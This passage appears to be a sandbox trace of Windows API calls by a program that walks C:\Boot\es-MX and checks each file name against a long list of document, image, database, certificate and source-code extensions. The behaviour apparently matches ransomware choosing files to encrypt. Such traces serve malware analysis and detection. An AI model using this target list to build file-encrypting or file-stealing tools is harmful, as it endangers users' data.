[0285.342] lstrlenW (lpString="C:\\Boot\\es-MX") returned 13 [0285.342] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0285.343] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.343] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.343] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.343] lstrlenW (lpString=".1cd") returned 4 [0285.343] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.343] lstrlenW (lpString=".3ds") returned 4 [0285.343] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.343] lstrlenW (lpString=".3fr") returned 4 [0285.343] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.343] lstrlenW (lpString=".3g2") returned 4 [0285.343] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.343] lstrlenW (lpString=".3gp") returned 4 [0285.343] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.343] lstrlenW (lpString=".7z") returned 3 [0285.343] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.343] lstrlenW (lpString=".accda") returned 6 [0285.343] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.343] lstrlenW (lpString=".accdb") returned 6 [0285.343] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.343] lstrlenW (lpString=".accdc") returned 6 [0285.343] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.344] lstrlenW (lpString=".accde") returned 6 [0285.344] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.344] lstrlenW (lpString=".accdt") returned 6 [0285.344] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.344] lstrlenW (lpString=".accdw") returned 6 [0285.344] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.344] lstrlenW (lpString=".adb") returned 4 [0285.344] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".adp") returned 4 [0285.344] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".ai") returned 3 [0285.344] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.344] lstrlenW (lpString=".ai3") returned 4 [0285.344] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".ai4") returned 4 [0285.344] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".ai5") returned 4 [0285.344] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".ai6") returned 4 [0285.344] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".ai7") returned 4 [0285.344] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".ai8") returned 4 [0285.344] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.344] lstrlenW (lpString=".anim") returned 5 [0285.344] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.345] lstrlenW (lpString=".arw") returned 4 [0285.345] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".as") returned 3 [0285.345] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.345] lstrlenW (lpString=".asa") returned 4 [0285.345] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".asc") returned 4 [0285.345] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".ascx") returned 5 [0285.345] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.345] lstrlenW (lpString=".asm") returned 4 [0285.345] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".asmx") returned 5 [0285.345] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.345] lstrlenW (lpString=".asp") returned 4 [0285.345] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".aspx") returned 5 [0285.345] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.345] lstrlenW (lpString=".asr") returned 4 [0285.345] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".asx") returned 4 [0285.345] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".avi") returned 4 [0285.345] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".avs") returned 4 [0285.345] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.345] lstrlenW (lpString=".backup") returned 7 [0285.346] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.346] lstrlenW (lpString=".bak") returned 4 [0285.346] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".bay") returned 4 [0285.346] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".bd") returned 3 [0285.346] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.346] lstrlenW (lpString=".bin") returned 4 [0285.346] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".bmp") returned 4 [0285.346] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".bz2") returned 4 [0285.346] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".c") returned 2 [0285.346] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.346] lstrlenW (lpString=".cdr") returned 4 [0285.346] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".cer") returned 4 [0285.346] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".cf") returned 3 [0285.346] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.346] lstrlenW (lpString=".cfc") returned 4 [0285.346] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".cfm") returned 4 [0285.346] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.346] lstrlenW (lpString=".cfml") returned 5 [0285.346] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.346] lstrlenW (lpString=".cfu") returned 4 [0285.347] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".chm") returned 4 [0285.347] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".cin") returned 4 [0285.347] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".class") returned 6 [0285.347] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.347] lstrlenW (lpString=".clx") returned 4 [0285.347] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".config") returned 7 [0285.347] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.347] lstrlenW (lpString=".cpp") returned 4 [0285.347] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".cr2") returned 4 [0285.347] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".crt") returned 4 [0285.347] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".crw") returned 4 [0285.347] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".cs") returned 3 [0285.347] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.347] lstrlenW (lpString=".css") returned 4 [0285.347] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".csv") returned 4 [0285.347] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".cub") returned 4 [0285.347] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.347] lstrlenW (lpString=".dae") returned 4 [0285.348] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dat") returned 4 [0285.348] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".db") returned 3 [0285.348] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.348] lstrlenW (lpString=".dbf") returned 4 [0285.348] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dbx") returned 4 [0285.348] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dc3") returned 4 [0285.348] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dcm") returned 4 [0285.348] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dcr") returned 4 [0285.348] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".der") returned 4 [0285.348] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dib") returned 4 [0285.348] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dic") returned 4 [0285.348] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".dif") returned 4 [0285.348] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.348] lstrlenW (lpString=".divx") returned 5 [0285.348] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.348] lstrlenW (lpString=".djvu") returned 5 [0285.348] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.348] lstrlenW (lpString=".dng") returned 4 [0285.348] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".doc") returned 4 [0285.349] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".docm") returned 5 [0285.349] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.349] lstrlenW (lpString=".docx") returned 5 [0285.349] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.349] lstrlenW (lpString=".dot") returned 4 [0285.349] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".dotm") returned 5 [0285.349] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.349] lstrlenW (lpString=".dotx") returned 5 [0285.349] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.349] lstrlenW (lpString=".dpx") returned 4 [0285.349] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".dqy") returned 4 [0285.349] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".dsn") returned 4 [0285.349] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".dt") returned 3 [0285.349] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.349] lstrlenW (lpString=".dtd") returned 4 [0285.349] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".dwg") returned 4 [0285.349] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".dwt") returned 4 [0285.349] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.349] lstrlenW (lpString=".dx") returned 3 [0285.349] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.349] lstrlenW (lpString=".dxf") returned 4 [0285.350] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".edml") returned 5 [0285.350] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.350] lstrlenW (lpString=".efd") returned 4 [0285.350] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".elf") returned 4 [0285.350] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".emf") returned 4 [0285.350] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".emz") returned 4 [0285.350] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".epf") returned 4 [0285.350] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".eps") returned 4 [0285.350] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".epsf") returned 5 [0285.350] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.350] lstrlenW (lpString=".epsp") returned 5 [0285.350] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.350] lstrlenW (lpString=".erf") returned 4 [0285.350] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".exr") returned 4 [0285.350] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".f4v") returned 4 [0285.350] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.350] lstrlenW (lpString=".fido") returned 5 [0285.351] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.351] lstrlenW (lpString=".flm") returned 4 [0285.351] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".flv") returned 4 [0285.351] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".frm") returned 4 [0285.351] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".fxg") returned 4 [0285.351] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".geo") returned 4 [0285.351] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".gif") returned 4 [0285.351] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".grs") returned 4 [0285.351] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".gz") returned 3 [0285.351] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.351] lstrlenW (lpString=".h") returned 2 [0285.351] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.351] lstrlenW (lpString=".hdr") returned 4 [0285.351] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".hpp") returned 4 [0285.351] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".hta") returned 4 [0285.351] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.351] lstrlenW (lpString=".htc") returned 4 [0285.351] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".htm") returned 4 [0285.352] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".html") returned 5 [0285.352] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.352] lstrlenW (lpString=".icb") returned 4 [0285.352] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".ics") returned 4 [0285.352] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".iff") returned 4 [0285.352] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".inc") returned 4 [0285.352] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".indd") returned 5 [0285.352] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.352] lstrlenW (lpString=".ini") returned 4 [0285.352] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".iqy") returned 4 [0285.352] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".j2c") returned 4 [0285.352] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".j2k") returned 4 [0285.352] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".java") returned 5 [0285.352] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.352] lstrlenW (lpString=".jp2") returned 4 [0285.352] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.352] lstrlenW (lpString=".jpc") returned 4 [0285.352] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".jpe") returned 4 [0285.353] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".jpeg") returned 5 [0285.353] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.353] lstrlenW (lpString=".jpf") returned 4 [0285.353] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".jpg") returned 4 [0285.353] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".jpx") returned 4 [0285.353] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".js") returned 3 [0285.353] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.353] lstrlenW (lpString=".jsf") returned 4 [0285.353] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".json") returned 5 [0285.353] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.353] lstrlenW (lpString=".jsp") returned 4 [0285.353] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".kdc") returned 4 [0285.353] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".kmz") returned 4 [0285.353] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".kwm") returned 4 [0285.353] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.353] lstrlenW (lpString=".lasso") returned 6 [0285.353] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.353] lstrlenW (lpString=".lbi") returned 4 [0285.353] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".lgf") returned 4 [0285.354] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".lgp") returned 4 [0285.354] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".log") returned 4 [0285.354] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".m1v") returned 4 [0285.354] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".m4a") returned 4 [0285.354] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".m4v") returned 4 [0285.354] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".max") returned 4 [0285.354] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".md") returned 3 [0285.354] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.354] lstrlenW (lpString=".mda") returned 4 [0285.354] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".mdb") returned 4 [0285.354] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".mde") returned 4 [0285.354] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".mdf") returned 4 [0285.354] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".mdw") returned 4 [0285.354] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.354] lstrlenW (lpString=".mef") returned 4 [0285.355] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mft") returned 4 [0285.355] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mfw") returned 4 [0285.355] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mht") returned 4 [0285.355] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mhtml") returned 6 [0285.355] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.355] lstrlenW (lpString=".mka") returned 4 [0285.355] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mkidx") returned 6 [0285.355] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.355] lstrlenW (lpString=".mkv") returned 4 [0285.355] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mos") returned 4 [0285.355] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mov") returned 4 [0285.355] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mp3") returned 4 [0285.355] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mp4") returned 4 [0285.355] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mpeg") returned 5 [0285.355] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.355] lstrlenW (lpString=".mpg") returned 4 [0285.355] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.355] lstrlenW (lpString=".mpv") returned 4 [0285.355] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.356] lstrlenW (lpString=".mrw") returned 4 [0285.356] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.356] lstrlenW (lpString=".msg") returned 4 [0285.356] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.356] lstrlenW (lpString=".mxl") returned 4 [0285.356] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".myd") returned 4 [0285.356] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".myi") returned 4 [0285.356] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".nef") returned 4 [0285.356] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".nrw") returned 4 [0285.356] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".obj") returned 4 [0285.356] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".odb") returned 4 [0285.356] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".odc") returned 4 [0285.356] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".odm") returned 4 [0285.356] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".odp") returned 4 [0285.356] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".ods") returned 4 [0285.356] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.356] lstrlenW (lpString=".oft") returned 4 [0285.357] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".one") returned 4 [0285.357] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".onepkg") returned 7 [0285.357] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.357] lstrlenW (lpString=".onetoc2") returned 8 [0285.357] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.357] lstrlenW (lpString=".opt") returned 4 [0285.357] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".oqy") returned 4 [0285.357] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".orf") returned 4 [0285.357] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".p12") returned 4 [0285.357] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".p7b") returned 4 [0285.357] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".p7c") returned 4 [0285.357] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".pam") returned 4 [0285.357] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".pbm") returned 4 [0285.357] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".pct") returned 4 [0285.357] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".pcx") returned 4 [0285.357] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.357] lstrlenW (lpString=".pdd") returned 4 [0285.357] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pdf") returned 4 [0285.358] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pdp") returned 4 [0285.358] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pef") returned 4 [0285.358] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pem") returned 4 [0285.358] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pff") returned 4 [0285.358] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pfm") returned 4 [0285.358] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pfx") returned 4 [0285.358] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".pgm") returned 4 [0285.358] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".php") returned 4 [0285.358] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.358] lstrlenW (lpString=".php3") returned 5 [0285.358] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.358] lstrlenW (lpString=".php4") returned 5 [0285.358] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.358] lstrlenW (lpString=".php5") returned 5 [0285.358] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.358] 